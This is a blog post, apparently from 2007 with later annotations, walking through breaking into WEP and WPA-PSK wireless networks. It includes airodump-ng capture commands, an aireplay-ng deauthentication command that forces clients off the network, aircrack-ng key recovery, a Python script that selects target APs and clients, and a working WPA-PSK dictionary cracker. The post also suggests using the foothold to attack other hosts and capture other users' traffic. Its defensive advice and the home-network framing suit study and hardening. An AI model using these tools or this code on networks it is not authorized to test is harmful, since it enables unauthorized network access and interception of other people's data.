Sunday, December 23, 2007

Wireless Network Penetration

The purpose of this blog post is to list the tools used and the steps followed for breaking into a wireless network protected with WEP or WPA-PSK encryption. Hopefully it will help the reader recognise how trivial it is to bypass WEP, or WPA-PSK protected with a weak passphrase.

The steps and tools below break WEP. The same tools also break WPA-PSK wherever a weak password or passphrase is in use, and I shall point out the changes necessary for WPA-PSK where appropriate.

The network that was penetrated in this example was my own network, however the encryption and setup were the same as what would usually be found on most wireless networks.

Tools Used
  • airodump-ng
  • aireplay-ng
  • aircrack-ng
  • Wireless Assistant

The Attack

1. I first run airodump-ng to identify the networks I can see. This also makes sure my card is configured correctly.

airodump-ng wlan0

I see from the output that it correctly identifies my wireless network "joker" on channel 3 and provides the BSSID (we need this for later).

If my card wasn't correctly set up (i.e. in monitor mode) I could either run airmon-ng or set it up manually as detailed below. Monitor mode is what matters for capturing raw 802.11 frames; the promisc flag is harmless but is not what does the work:

ifconfig wlan0 down
ifconfig wlan0 promisc
iwconfig wlan0 mode monitor
ifconfig wlan0 up

Then I would use ifconfig and iwconfig to make sure the settings were correct.

2. I now run airodump-ng with switches telling it to collect only the Initialization Vectors (IVs) on channel 3 and write them to a file, using my wireless interface (wlan0):

airodump-ng --ivs -c 3 -w wepdump wlan0

The result is two files, wepdump-01.txt and wepdump-01.ivs. The .ivs file is the one I am interested in.

When capturing data to break WPA-PSK do not use the --ivs switch. WPA-PSK is not attacked through IVs at all: aircrack-ng needs a complete four-way handshake between a client and the AP, so the entire packets must be captured. If no client joins while you are listening, force one that is already connected to re-associate (and so redo the handshake) with aireplay-ng's deauthentication mode:

aireplay-ng -0 1 -a {AP BSSID} -c {client MAC} wlan0

To obtain the AP BSSID and the client MAC I use Kismet, but airodump-ng shows them too: associated clients appear in its STATION section alongside the BSSID they are attached to.

Note: when collecting IVs, the best signal you can get will speed things up.
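Picking the target and its clients out of the airodump-ng dump can be scripted rather than read off the screen. The following is an added example of mine, not code from the original post or from the aircrack-ng project. It parses the CSV file airodump-ng writes next to the capture (wepdump-01.txt here; the column set is the current aircrack-ng layout, which has more columns than the 2007 build, so the parser keys on header names rather than positions), finds the AP by ESSID, lists the stations associated with it, and builds the airodump-ng and aireplay-ng argument vectors for the WEP and WPA cases. The CSV snapshot, the second AP and the client MACs are constructed for the example; only the "joker" BSSID is taken from the post.

```python
import csv
import io
import re

MAC_RE = re.compile(r"^(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")

# Constructed airodump-ng CSV snapshot (the wepdump-01.txt/.csv companion file).
# Only the "joker" BSSID comes from the post; everything else is made up for the demo.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:18:F8:4B:43:86, 2007-12-23 14:01:02, 2007-12-23 14:16:10,  3,  54, WEP, WEP, OPN, -45,   840,    41253,   0.  0.  0.  0,   5, joker,
00:0F:66:AA:BB:CC, 2007-12-23 14:01:03, 2007-12-23 14:16:08, 11,  54, WPA, TKIP, PSK, -71,   512,        0,   0.  0.  0.  0,   8, neighbor,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:1B:77:12:34:56, 2007-12-23 14:01:05, 2007-12-23 14:16:09, -50,     3120, 00:18:F8:4B:43:86, joker
00:16:CE:99:88:77, 2007-12-23 14:02:11, 2007-12-23 14:15:59, -68,       40, (not associated), neighbor,joker
"""


def _parse_section(text):
    """Parse one airodump-ng CSV section into dicts keyed by the header names."""
    rows = list(csv.reader(io.StringIO(text), skipinitialspace=True))
    header = [h.strip() for h in rows[0]]
    records = []
    for row in rows[1:]:
        cells = [c.strip() for c in row]
        if not cells or not MAC_RE.match(cells[0]):
            continue  # blank line or stray text, not a data row
        if len(cells) > len(header):
            # Probed ESSIDs are themselves comma separated; fold the overflow into the last column
            cells = cells[:len(header) - 1] + [",".join(cells[len(header) - 1:])]
        records.append(dict(zip(header, cells)))
    return records


def parse_airodump_csv(text):
    """Split the dump into its AP and station sections (airodump-ng separates them with a blank line)."""
    ap_text, _, station_text = text.strip().partition("\n\n")
    return _parse_section(ap_text), _parse_section(station_text)


def find_ap(aps, essid):
    return next((ap for ap in aps if ap["ESSID"] == essid), None)


def clients_of(stations, bssid):
    """Station MACs whose BSSID column says they are associated with this AP."""
    return [s["Station MAC"] for s in stations if s["BSSID"].lower() == bssid.lower()]


def capture_argv(iface, channel, prefix, wep):
    """airodump-ng command line: --ivs only for WEP, since WPA needs whole frames for the handshake."""
    argv = ["airodump-ng"]
    if wep:
        argv.append("--ivs")
    argv += ["-c", str(channel), "-w", prefix, iface]
    return argv


def deauth_argv(iface, bssid, client, count=1):
    """aireplay-ng deauthentication that forces the client to re-associate (and redo the handshake)."""
    for mac in (bssid, client):
        if not MAC_RE.match(mac):
            raise ValueError("not a MAC address: %r" % mac)
    return ["aireplay-ng", "-0", str(count), "-a", bssid, "-c", client, iface]


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    target = find_ap(aps, "joker")
    print(" ".join(capture_argv("wlan0", target["channel"], "wepdump", target["Privacy"] == "WEP")))
    for client in clients_of(stations, target["BSSID"]):
        print(" ".join(deauth_argv("wlan0", target["BSSID"], client)))
```

The commands are returned as argument vectors rather than strings so they can be handed straight to subprocess without shell quoting; the MAC check on the deauth arguments catches a copied-and-pasted "(not associated)" before aireplay-ng sees it.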

3. After 15 minutes I stop the capture and run the collected IVs through aircrack-ng, specifying the BSSID on the command line. How long you need to capture depends on traffic: aircrack-ng wants tens of thousands of unique IVs, and a quiet network produces them slowly.

aircrack-ng -b 00:18:F8:4B:43:86 wepdump-01.ivs

As you can see it has recovered the key as C3:C0:8C:90:3D. Five bytes means a 40-bit key (sold as "64-bit" WEP, the other 24 bits being the IV); a 104-bit ("128-bit") key comes out as 13 bytes and needs more IVs.

If I were cracking WPA-PSK I would need to specify a dictionary file containing the passphrase with the -w switch. aircrack-ng only attempts this when the capture holds a complete handshake for that BSSID, and it can only succeed if the passphrase is in the wordlist. My syntax would therefore look like this:

aircrack-ng -b 00:18:F8:4B:43:86 -w big-dictionary-file wpadump-01.cap
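What the -w dictionary run actually does, as an added example of mine rather than code from the post or from aircrack-ng: each candidate passphrase is stretched into a PMK with PBKDF2-HMAC-SHA1 (4096 rounds, the SSID as salt), the PTK is derived from the PMK plus the two MACs and two nonces seen in the handshake, and the first 16 bytes of the PTK (the KCK) are used to recompute the MIC on the client's EAPOL-Key message 2. A match means the candidate is the passphrase. The 4096 rounds are why the attack is slow per guess, and a weak passphrase is why it still works. The handshake here is constructed inside the block (the "joker" BSSID is from the post; the client MAC, nonces, EAPOL frame and the passphrase "password1" are made up); against a real .cap you would pull the same fields out of the captured frames.

```python
import hashlib
import hmac


def pmk_from_passphrase(passphrase, ssid):
    """802.11i PSK mapping: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key, label, data):
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, first 64 bytes."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(MACs)||max(MACs)||min(nonces)||max(nonces)).
    CCMP uses PRF-384, but the KCK (first 16 bytes) is identical, which is all the MIC check needs."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk, b"Pairwise key expansion", data)


def build_eapol_msg2(snonce, version):
    """Constructed EAPOL-Key message 2 (RSN descriptor) with its MIC field zeroed.
    version 1 = WPA/TKIP (HMAC-MD5 MIC), version 2 = WPA2/CCMP (HMAC-SHA1 MIC)."""
    key_info = 0x0108 | version            # pairwise (0x0008) + MIC present (0x0100) + descriptor version
    body = (bytes([2]) + key_info.to_bytes(2, "big") + (0).to_bytes(2, "big")
            + (1).to_bytes(8, "big")       # replay counter
            + snonce                       # 32-byte supplicant nonce
            + bytes(16) + bytes(8) + bytes(8)  # key IV, RSC, key ID (unused in message 2)
            + bytes(16)                    # MIC field, zero while the MIC is computed
            + (0).to_bytes(2, "big"))      # no key data in this demo
    return bytes([1, 3]) + len(body).to_bytes(2, "big") + body  # EAPOL v1, type 3 = Key


def eapol_mic(kck, eapol, version):
    digest = hashlib.md5 if version == 1 else hashlib.sha1
    return hmac.new(kck, eapol, digest).digest()[:16]


def make_handshake(ssid, passphrase, ap_mac, sta_mac, anonce, snonce, version=2):
    """Construct what an attacker recovers from the .cap: MACs, nonces, the EAPOL frame and its MIC."""
    pmk = pmk_from_passphrase(passphrase, ssid)
    kck = derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
    eapol = build_eapol_msg2(snonce, version)
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce, "snonce": snonce,
            "eapol": eapol, "mic": eapol_mic(kck, eapol, version), "version": version}


def crack_psk(hs, wordlist):
    """The dictionary attack behind aircrack-ng -w: re-derive the MIC per candidate and compare."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, hs["ssid"])
        kck = derive_ptk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"], hs["version"]), hs["mic"]):
            return candidate
    return None


# Constructed handshake for "joker": BSSID from the post, client MAC, nonces and passphrase made up.
HANDSHAKE = make_handshake(
    "joker", "password1",
    bytes.fromhex("0018f84b4386"), bytes.fromhex("001b77123456"),
    hashlib.sha256(b"anonce").digest(), hashlib.sha256(b"snonce").digest())

if __name__ == "__main__":
    print(crack_psk(HANDSHAKE, ["letmein", "joker2007", "password1", "correcthorse"]))
```

Note what the attacker never needs: the AP's private key material or any traffic beyond the handshake. Everything on the right-hand side of the comparison is public once the four frames are captured, which is why the only defence is a passphrase that is not in any wordlist.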

4. I now reconfigure my wireless card to connect to the wireless network.

Currently the card is in monitor mode, so I reconfigure it with the following commands (note the mode keyword: iwconfig wants "mode managed", the counterpart of "mode monitor" above):

ifconfig wlan0 down
ifconfig wlan0 -promisc
iwconfig wlan0 mode managed
ifconfig wlan0 up

Once reconfigured I quickly check I can see the target network using:

iwlist wlan0 scan

5. I now use Wireless Assistant to connect to the target network with the key.

6. After connecting to the target network I check my network and wireless settings and test connectivity to the web.

Now that I have an IP address on this network I can use the connection to reach the Internet, attack other hosts on the wireless network, or capture the other users' web traffic and do interesting things with that.


WEP encryption is very broken. Use it only as a last resort, when no other encryption is available; otherwise use WPA/WPA2-PSK with a long, random passphrase that will not appear in any wordlist, since against the dictionary attack described above WPA-PSK is exactly as strong as its passphrase. If you do need to use WEP, use additional layers of security to protect your network further, such as MAC address filtering, a hidden SSID, fixed IPs or a limited DHCP scope. These measures can all be bypassed (a permitted MAC address is readable from the capture and trivially spoofed, and a hidden SSID still shows up in client probes), but they make the attacker's job that little bit harder.

Thanks to the guys at Remote Exploit for putting together BackTrack. BackTrack3 Kicks Ass!!!

